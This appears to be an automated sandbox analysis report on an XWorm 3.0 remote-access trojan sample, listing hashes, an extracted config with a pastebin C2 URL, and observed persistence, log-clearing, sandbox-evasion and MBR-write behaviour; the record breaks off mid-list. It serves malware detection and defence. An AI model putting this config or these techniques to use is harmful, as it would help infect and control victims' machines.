Analysis
-
max time kernel
57s -
max time network
56s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250113-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
24-01-2025 02:37
Static task
static1
Behavioral task
behavioral1
Sample
$77Test.exe
Resource
win10ltsc2021-20250113-en
General
-
Target
$77Test.exe
-
Size
178KB
-
MD5
5b29aa7bc64ce7a59e945d4f03ab1609
-
SHA1
2a20d808eebb856992481d506e3cbbabb87784f8
-
SHA256
8447ead3867613cf99681b3702f32486e30bef2094090465034a8f9aa6b5d85b
-
SHA512
2db3196889aa243a106e87fe794bf9458c24306d0f38e49ff3624c055a13f79de86082d031693dd0d14f19926cf4a67ba169e298325a38868cb970990c95eb41
-
SSDEEP
3072:EFrK6JiDXY14ByBjjLZV6nqXfBYiosJdtM2dRmubBZENoHULR83uNMxjevy:EFm6YI1xH/0GJ5B5UOeqpe
Malware Config
Extracted
xworm
3.0
wfoLbsEbfKI2RWId
-
Install_directory
%Public%
-
install_file
USB.exe
-
pastebin_url
https://pastebin.com/raw/pBTfntdP
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x0029000000046191-16.dat family_xworm behavioral1/memory/2780-28-0x0000000000290000-0x000000000029E000-memory.dmp family_xworm -
Xworm family
-
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" WaaSMedicAgent.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-564748828-2201999071-3764224244-1000\Control Panel\International\Geo\Nation $77Test.exe Key value queried \REGISTRY\USER\S-1-5-21-564748828-2201999071-3764224244-1000\Control Panel\International\Geo\Nation $77Client.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Client.lnk $77Client.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Client.lnk $77Client.exe -
Executes dropped EXE 3 IoCs
pid Process 2780 $77Client.exe 2692 $77Installer.exe 2564 $77Client.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx svchost.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-564748828-2201999071-3764224244-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77Client = "C:\\Users\\Public\\$77Client.exe" $77Client.exe -
pid Process 3444 powershell.EXE -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\I: svchost.exe File opened (read-only) \??\J: svchost.exe File opened (read-only) \??\M: svchost.exe File opened (read-only) \??\T: svchost.exe File opened (read-only) \??\W: svchost.exe File opened (read-only) \??\K: svchost.exe File opened (read-only) \??\O: svchost.exe File opened (read-only) \??\Q: svchost.exe File opened (read-only) \??\U: svchost.exe File opened (read-only) \??\Z: svchost.exe File opened (read-only) \??\N: svchost.exe File opened (read-only) \??\P: svchost.exe File opened (read-only) \??\V: svchost.exe File opened (read-only) \??\A: svchost.exe File opened (read-only) \??\B: svchost.exe File opened (read-only) \??\G: svchost.exe File opened (read-only) \??\H: svchost.exe File opened (read-only) \??\L: svchost.exe File opened (read-only) \??\X: svchost.exe File opened (read-only) \??\E: svchost.exe File opened (read-only) \??\R: svchost.exe File opened (read-only) \??\S: svchost.exe File opened (read-only) \??\Y: svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 17 IoCs
flow ioc 33 pastebin.com 39 pastebin.com 55 pastebin.com 56 pastebin.com 54 pastebin.com 53 pastebin.com 57 pastebin.com 29 pastebin.com 36 pastebin.com 37 pastebin.com 38 pastebin.com 50 pastebin.com 52 pastebin.com 20 pastebin.com 21 pastebin.com 28 pastebin.com 51 pastebin.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 17 ip-api.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 wmiprvse.exe -
Drops file in System32 directory 7 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Tasks\$77Client svchost.exe -
Drops file in Windows directory 6 IoCs
description ioc Process File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language $77Installer.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe -
Modifies data under HKEY_USERS 58 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "0018001210319D6F" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000847cc0e5cd200b4fb62542c4c7edf4a800000000020000000000106600000001000020000000da4185759d6aad280e37a7b84cdeb59244333db867cd4918654ab96c27a9a12c000000000e80000000020000200000000d65e94687e16676c735ae6426642fc7d6e4c553e5189b37862db0c1e6344b46b00300004f4c49f837a5bae4c3822c27ca77299345af86940122689d48f55d1b391680fd43e95310db51a3403351386d220202439235c859d20f62dc879334896b5d8baede9b3b9093d06d746d6a732cd57541ad16c229b55408433669e37d5892c0587839c843a86b9d9be964b4a66086a48b56f3407240a462864abe8160354f0ff5f3e0802fa2c6c9c407ecdd441ea8ba07646923739df2c61d375c5bc2a54e7a95849616b96733f250527c0c18055a51b2f08a33d7027b7148b30c2d134e008959df2db01effbc5152b14ed81583294f3876861d85d400c215fc212c48d1aa7e80fed8f388d9178b41919d2a8704fde8596f01acfd2752188fc5652a42b0c4beee3704a1791a532c2ff62baf2b38626dbf550c597897614cb5b77a55a67321538a043b4430ff2c3e2bb0e61dd169edb85b2de18252dd17d9781a134d8e75c9c557399bd330b03f1e4298be0e6587571740338f8a1341092a643055c87038a3833c9df2697b8b708ee9dae8c2badbceac617a18528f189b206210f7e9bfaae0d0623321e0bfc9c6d51b7b4830e1753e540d8e9d64d2aa224b4e7cc48ad5573f9312f02f00d898bb312e4e60e3e029fc0e2371923ffd5a511085cc5669df5abc0ce9e5a78494434ce55a953fe33489ea0f47f84ffdce73bfff38c324d5e88409aa129c545e365aa5cfef63abb859c324956195899c17e83e77caa2b07ee9197a08df532ebb285aa5890261d5430f177242ca835080ca64360bfde309c255e3faecaa03bd19bfc7f849a863ed27ed538f7f8b37ec386da48cf430d619fa4d133f81a53b2cf897d44ad57f0b60bf05f7a43580890dd62edd91e30fb9a2312c8d156c28320af518d2cf5f7f3c9fb22e109c9b2a2e0122ef4d79465341a7af67c73af15d7ed089a34784e90bc28761118614ee43cae95530e33b7f58802b30025cc4d30cd9d12b47aac68b9929fd366cc8ab0c5a79e2832d0bf7e31ed56cb248464cbabc0e6690789f758d850b8a5bc3b261ad387b18218fdf24e2d542a4c5fa140f04b3d440d0adaf153ddc8c782f177cbe9535bd072234b2854fdf0df8f663f64337f6fadcfca16ac49d2bd665d7b58e0556063dad31dede2823a5e6d904f187ac64af981b36d70ce728d398f58449f85cfeb84720e2b87da237d81c8ddd5ff03e764e7d0612acc8a4e47c9fc90079877d3c46643d691cb47e72a5bac4b59bb2454741a8a8a08097d689dba3a07fd08a6554552824929782d35b82b2cf03e50e3adbde3ea7c5c76462cbad85f9fdf4988103e34267e2994d8b0df56ca3f9fc4f4f6b27b08228f8ff27a6dfc55ba24697d586f16440000000c97d4a1df7c170cd7f7adef728a7f2d5e4bc05be63310450378e30320fe62ac31c5fcd1d83a9a9acf50305e16cccff154b9a4fb9f1d6674799b7cc0906ca0afb mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018001210319D6F = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000847cc0e5cd200b4fb62542c4c7edf4a8000000000200000000001066000000010000200000000e83d58342d2e4c5e5e678fe668419913e7e8b13ce9018e3d771e6929225af0a000000000e8000000002000020000000a7c427ef51c092210e88a72c5e446f8ef11ad7b7d18d8ed0dc06366051e9a365800000009f38a63f42d39245cbdb08ecd5f45a9122fd38a74d0a28cd875c662cf2d1c9f6345ac46dbba725eac93e3c6cd07cbdf33ca186fdb51015b704e60e228aec22fa8a0940c1ab3706aa603e30afdcd6c4f4b836a0286c0a5fe743bb732a6cd5220e347ae479b3c0bf1bb5948bd07329bf995606d6d0d9cea963b72480e5af55fadb400000009a0642fe38e07c9623ab7db8c359870d5ec96ac528cda86490622e363965deaafc384a6ca702beb0735101d7ed8459d62c37b6d919f87dd0a5c61f077aada35d mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018001210319D6F" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe -
Modifies registry class 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-564748828-2201999071-3764224244-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3344 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3444 powershell.EXE 3444 powershell.EXE 3444 powershell.EXE 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 2100 wmiprvse.exe 2100 wmiprvse.exe 2100 wmiprvse.exe 2100 wmiprvse.exe 2100 wmiprvse.exe 2100 wmiprvse.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 2100 wmiprvse.exe 2100 wmiprvse.exe 2100 wmiprvse.exe 2100 wmiprvse.exe 620 winlogon.exe 620 winlogon.exe 2100 wmiprvse.exe 2100 wmiprvse.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe 620 winlogon.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3604 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2780 $77Client.exe Token: SeDebugPrivilege 3444 powershell.EXE Token: SeDebugPrivilege 3444 powershell.EXE Token: SeDebugPrivilege 620 winlogon.exe Token: SeShutdownPrivilege 1916 svchost.exe Token: SeCreatePagefilePrivilege 1916 svchost.exe Token: SeShutdownPrivilege 1916 svchost.exe Token: SeCreatePagefilePrivilege 1916 svchost.exe Token: SeShutdownPrivilege 1916 svchost.exe Token: SeCreatePagefilePrivilege 1916 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2028 svchost.exe Token: SeIncreaseQuotaPrivilege 2028 svchost.exe Token: SeSecurityPrivilege 2028 svchost.exe Token: SeTakeOwnershipPrivilege 2028 svchost.exe Token: SeLoadDriverPrivilege 2028 svchost.exe Token: SeBackupPrivilege 2028 svchost.exe Token: SeRestorePrivilege 2028 svchost.exe Token: SeShutdownPrivilege 2028 svchost.exe Token: SeSystemEnvironmentPrivilege 2028 svchost.exe Token: SeManageVolumePrivilege 2028 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2028 svchost.exe Token: SeIncreaseQuotaPrivilege 2028 svchost.exe Token: SeSecurityPrivilege 2028 svchost.exe Token: SeTakeOwnershipPrivilege 2028 svchost.exe Token: SeLoadDriverPrivilege 2028 svchost.exe Token: SeSystemtimePrivilege 2028 svchost.exe Token: SeBackupPrivilege 2028 svchost.exe Token: SeRestorePrivilege 2028 svchost.exe Token: SeShutdownPrivilege 2028 svchost.exe Token: SeSystemEnvironmentPrivilege 2028 svchost.exe Token: SeUndockPrivilege 2028 svchost.exe Token: SeManageVolumePrivilege 2028 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2028 svchost.exe Token: SeIncreaseQuotaPrivilege 2028 svchost.exe Token: SeSecurityPrivilege 2028 svchost.exe Token: SeTakeOwnershipPrivilege 2028 svchost.exe Token: SeLoadDriverPrivilege 2028 svchost.exe Token: SeSystemtimePrivilege 2028 svchost.exe Token: SeBackupPrivilege 2028 svchost.exe Token: SeRestorePrivilege 2028 svchost.exe Token: SeShutdownPrivilege 2028 svchost.exe Token: SeSystemEnvironmentPrivilege 2028 svchost.exe Token: SeUndockPrivilege 2028 svchost.exe Token: SeManageVolumePrivilege 2028 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2028 svchost.exe Token: SeIncreaseQuotaPrivilege 2028 svchost.exe Token: SeSecurityPrivilege 2028 svchost.exe Token: SeTakeOwnershipPrivilege 2028 svchost.exe Token: SeLoadDriverPrivilege 2028 svchost.exe Token: SeSystemtimePrivilege 2028 svchost.exe Token: SeBackupPrivilege 2028 svchost.exe Token: SeRestorePrivilege 2028 svchost.exe Token: SeShutdownPrivilege 2028 svchost.exe Token: SeSystemEnvironmentPrivilege 2028 svchost.exe Token: SeUndockPrivilege 2028 svchost.exe Token: SeManageVolumePrivilege 2028 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2028 svchost.exe Token: SeIncreaseQuotaPrivilege 2028 svchost.exe Token: SeSecurityPrivilege 2028 svchost.exe Token: SeTakeOwnershipPrivilege 2028 svchost.exe Token: SeLoadDriverPrivilege 2028 svchost.exe Token: SeSystemtimePrivilege 2028 svchost.exe Token: SeBackupPrivilege 2028 svchost.exe Token: SeRestorePrivilege 2028 svchost.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3604 Explorer.EXE 3604 Explorer.EXE 3604 Explorer.EXE 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3604 Explorer.EXE 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe 3872 taskmgr.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3836 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 372 wrote to memory of 2780 372 $77Test.exe 83 PID 372 wrote to memory of 2780 372 $77Test.exe 83 PID 372 wrote to memory of 2692 372 $77Test.exe 84 PID 372 wrote to memory of 2692 372 $77Test.exe 84 PID 372 wrote to memory of 2692 372 $77Test.exe 84 PID 3444 wrote to memory of 620 3444 powershell.EXE 5 PID 620 wrote to memory of 676 620 winlogon.exe 7 PID 620 wrote to memory of 960 620 winlogon.exe 12 PID 620 wrote to memory of 408 620 winlogon.exe 13 PID 620 wrote to memory of 700 620 winlogon.exe 14 PID 620 wrote to memory of 880 620 winlogon.exe 15 PID 620 wrote to memory of 908 620 winlogon.exe 16 PID 620 wrote to memory of 1056 620 winlogon.exe 17 PID 620 wrote to memory of 1092 620 winlogon.exe 18 PID 620 wrote to memory of 1140 620 winlogon.exe 19 PID 620 wrote to memory of 1228 620 winlogon.exe 20 PID 620 wrote to memory of 1268 620 winlogon.exe 21 PID 620 wrote to memory of 1392 620 winlogon.exe 23 PID 620 wrote to memory of 1504 620 winlogon.exe 24 PID 620 wrote to memory of 1524 620 winlogon.exe 25 PID 620 wrote to memory of 1540 620 winlogon.exe 26 PID 620 wrote to memory of 1572 620 winlogon.exe 27 PID 620 wrote to memory of 1596 620 winlogon.exe 28 PID 620 wrote to memory of 1700 620 winlogon.exe 29 PID 620 wrote to memory of 